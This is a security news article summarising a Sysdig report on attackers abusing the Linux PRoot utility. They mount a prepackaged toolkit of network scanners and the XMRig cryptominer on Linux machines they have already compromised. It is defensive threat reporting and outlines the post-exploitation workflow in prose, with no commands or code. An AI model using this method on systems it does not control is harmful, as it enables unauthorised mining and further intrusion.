Hackers abuse the open-source Linux PRoot utility in BYOF (Bring Your Own Filesystem) attacks to provide a consistent repository of malicious tools that run on many Linux distributions.

A Bring Your Own Filesystem attack occurs when hackers create a malicious filesystem on their own devices that contains a standard set of tools used to carry out attacks.

This file system is then downloaded and mounted on compromised machines, providing a preconfigured toolkit that can be used to further compromise a Linux system.

“First, hackers build a malicious filesystem that will be deployed. This malicious filesystem includes everything the operation needs to succeed,” says a new report from Sysdig.

“Doing this preparation at this early stage allows all tools to be downloaded, configured or installed on the attacker’s own system away from the prying eyes of detection tools.”

Sysdig says attacks typically lead to cryptocurrency mining, although more dangerous scenarios are possible.

The researchers also warn of the ease with which this new technique could make it easier to scale malicious operations against Linux endpoints of all kinds.

Abuse of the Linux PRoot utility

PRoot is an open source utility that combines ‘chroot’, ‘mount –bind’ and ‘binfmt_misc’ commands, allowing users to set up an isolated root filesystem on Linux.

By default, PRoot processes are confined to the guest filesystem; however, QEMU emulation can be used to mix the execution of host and guest programs.

Additionally, guest file system programs can use the built-in mount/link mechanism to access host system files and directories.

The attacks seen by Sysdig use PRoot to deploy a malicious filesystem to already compromised systems that include network scanning tools such as “masscan” and “nmap”, the XMRig cryptominer, and their configuration files.

The filesystem contains everything needed for the attack, neatly packaged in a Gzip compressed tar file with all necessary dependencies, removed directly from trusted cloud hosting services like DropBox.

As PRoot is statically compiled and does not require any dependencies, hackers simply download the precompiled binary from GitLab and run it on the attacker’s downloaded and extracted filesystem to mount it.

In most cases seen by Sysdig, attackers unpacked the filesystem to ‘/tmp/Proot/’ and then activated the XMRig cryptominer.

“Any dependencies or configurations are also included in the filesystem, so the attacker does not need to run any additional configuration commands,” Sysdig explains.

“The attacker runs PRoot, points it to the decompressed malicious filesystem, and specifies the XMRig binary to run.”

As Sysdig points out in the report, threat actors could easily use PRoot to download other payloads besides XMRig, potentially causing more severe damage to the hacked system.

The presence of “mascan” on the malicious file system implies an aggressive attitude on the part of the attackers, probably indicating that they plan to breach other systems from the compromised machine.

Rationalization of attacks

Hackers’ misuse of PRoot makes these post-exploitation attacks platform- and distribution-independent, increasing the chances of success and stealthiness of threat actors.

Additionally, preconfigured PRoot filesystems allow attackers to use a toolkit on many OS configurations without having to port their malware to the targeted architecture or include build dependencies and tools. .

“By using PRoot, there is little regard or concern for the architecture or distribution of the target since the tool mitigates attack difficulties often associated with executable compatibility, environment configuration and execution of malware and/or miners,” says Sysdig.

“It allows attackers to get closer to the ‘write once, run everywhere’ philosophy, which has been a long-sought goal.”

PRoot-backed attacks render environment configuration irrelevant to hackers, allowing them to rapidly scale up their malicious operations.